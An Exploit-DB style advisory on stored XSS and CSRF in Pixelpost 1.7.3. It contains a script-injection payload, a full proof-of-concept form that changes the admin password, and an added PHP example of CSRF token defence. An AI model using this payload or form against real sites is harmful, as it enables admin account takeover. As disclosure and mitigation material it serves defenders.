Author: Sweet
CVSS: 7.5 (HIGH)
CWE: Stored XSS, CSRF
Affected Version From: 1.7.2003
Patch Exists: NO
Platforms Tested: Windows XP SP3
Year: 2010

pixelpost_v1.7.3 Multiple vulnerabilities

Pixelpost version 1.7.3 is vulnerable to stored XSS and CSRF. The 'Image Title' and 'tags' POST parameters of the admin page (admin/index.php, which requires an admin login) are vulnerable to stored XSS: an attacker can inject a payload such as <script>alert('sweet')</script> and have arbitrary JavaScript execute for whoever views the stored value. Additionally, the admin password change function is vulnerable to CSRF: an attacker can change the admin password by getting an authenticated admin to submit a crafted request to the 'options' endpoint.

Mitigation:

Upgrade to a version higher than 1.7.3, if available. Apply necessary patches and security updates. Use input validation and output encoding to prevent XSS attacks. Implement CSRF protection mechanisms, such as using CSRF tokens.

Exploit-DB raw data:

[+] Exploit Title: pixelpost_v1.7.3 Multiple vulnerabilities
[+] Date: 15/09/2010
[+] Author: Sweet
[+] Contact: charif38@hotmail.fr
[+] Software Link: http://www.pixelpost.org/
[+] Download: http://www.pixelpost.org/
[+] Version: 1.7.3
[+] Tested on: WinXp sp3
[+] Risk: High
[+] Description:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

---=Stored XSS=---
admin login required

In http://www.target.com/path/admin/index.php? the POST variables "Image Title" and "tags" are vulnerable to stored XSS.

attack pattern:>"<script>alert("sweet")</script>

---=CSRF change admin password=--- 
<html>
<body>
<h1>Pixelpost_v1.7.3 change admin password CSRF by Sweet </h1>
<form method="POST" name="form0" action="http://www.target.com/path/admin/index.php?view=options&optaction=updateall">
<input type="hidden" name="new_site_title" value="Pixelpost"/>
<input type="hidden" name="new_sub_title" value="Authentic photoblog flavour"/>
<input type="hidden" name="new_site_url" value="http://www.target.com/path/"/>
<input type="hidden" name="new_admin_user" value="admin"/>
<input type="hidden" name="newadminpass" value="password"/> <!-- Your password here -->
<input type="hidden" name="newadminpass_re" value="password"/> <!-- Your password here -->
<input type="hidden" name="passchanged" value="no"/>
<input type="hidden" name="new_lang" value="english"/>
<input type="hidden" name="alt_lang" value="Off"/>
<input type="hidden" name="new_admin_lang" value="english"/>
<input type="hidden" name="new_email" value="charif38@hotmail.fr"/><!-- Your Email here -->
<input type="hidden" name="new_image_path" value="../images/"/>
<input type="hidden" name="new_thumbnail_path" value="../thumbnails/"/>
<input type="hidden" name="timezone" value="0"/>
<input type="hidden" name="global_comments" value="A"/>
<input type="hidden" name="new_commentemail" value="no"/>
<input type="hidden" name="new_htmlemailnote" value="yes"/>
<input type="hidden" name="timestamp" value="yes"/>
<input type="hidden" name="visitorbooking" value="yes"/>
<input type="hidden" name="markdown" value="F"/>
<input type="hidden" name="exif" value="T"/>
<input type="hidden" name="feed_title" value="Pixelpost"/>
<input type="hidden" name="feed_description" value="Authentic photoblog flavour"/>
<input type="hidden" name="feed_copyright" value="Copyright 2010 http://www.target.com/path/, All Rights Reserved"/>
<input type="hidden" name="feed_discovery" value="RA"/>
<input type="hidden" name="feed_external_type" value="ER"/>
<input type="hidden" name="feed_external" value=""/>
<input type="hidden" name="allow_comment_feed" value="Y"/>
<input type="hidden" name="rsstype" value="T"/>
<input type="hidden" name="feeditems" value="10"/>
<input type="hidden" name="display_sort_by" value="datetime"/>
<input type="hidden" name="display_order" value="default"/>
<p> Push the button <input type="submit" name="update" value="GO!"/></p>
</form>
</body>
</html>
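As an added mitigation example (not Pixelpost's code and not from the advisory author), the following hypothetical PHP handler shows how the options update targeted by the form above would reject a forged POST with a per-session CSRF token plus an Origin/Referer host check, and how output encoding renders the stored ">"<script>" pattern harmless. SITE_HOST, csrf_token, csrf_request_is_valid and h are assumed names, and PHP 7+ is assumed.

```php
<?php
// Added example, not Pixelpost code: a hypothetical replacement for the admin
// "options" update handler that rejects POSTs lacking a per-session synchronizer
// token and HTML-encodes stored titles/tags on output. Assumes PHP 7+ (random_bytes).
session_start();
const SITE_HOST = 'www.target.com'; // assumed deployment host, taken from the PoC URL
// One unpredictable per-session token; the cross-site PoC form cannot read it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}
// Constant-time token check, plus an Origin/Referer host check when the browser
// sends one (absent headers fall back to the token alone).
function csrf_request_is_valid(array $post, array $server): bool
{
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        return false;
    }
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $header) {
        if (!empty($server[$header])) {
            return parse_url($server[$header], PHP_URL_HOST) === SITE_HOST;
        }
    }
    return true;
}
// Output encoding for user-controlled strings ("Image Title", "tags"): the stored
// >"<script>...</script> pattern is rendered as text instead of executing.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
$isOptionsUpdate = $_SERVER['REQUEST_METHOD'] === 'POST'
    && ($_GET['view'] ?? '') === 'options' && ($_GET['optaction'] ?? '') === 'updateall';
if ($isOptionsUpdate && !csrf_request_is_valid($_POST, $_SERVER)) {
    http_response_code(403);
    exit('Request rejected: missing or invalid CSRF token');
}
// The newadminpass / newadminpass_re change would be processed only past this point.
?>
<form method="POST" action="index.php?view=options&amp;optaction=updateall">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>"/>
  <input type="password" name="newadminpass"/> <input type="password" name="newadminpass_re"/>
  <input type="submit" name="update" value="Save"/>
</form>
```

The legitimate admin form carries the hidden csrf_token field, which the attacker's page cannot populate, so the PoC above receives a 403 instead of changing the password.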

thx to Milw0rm.com , JF - Hamst0r - Keystroke  , inj3ct0r.com , exploit-db.com


1,2,3 viva L'Algerie :))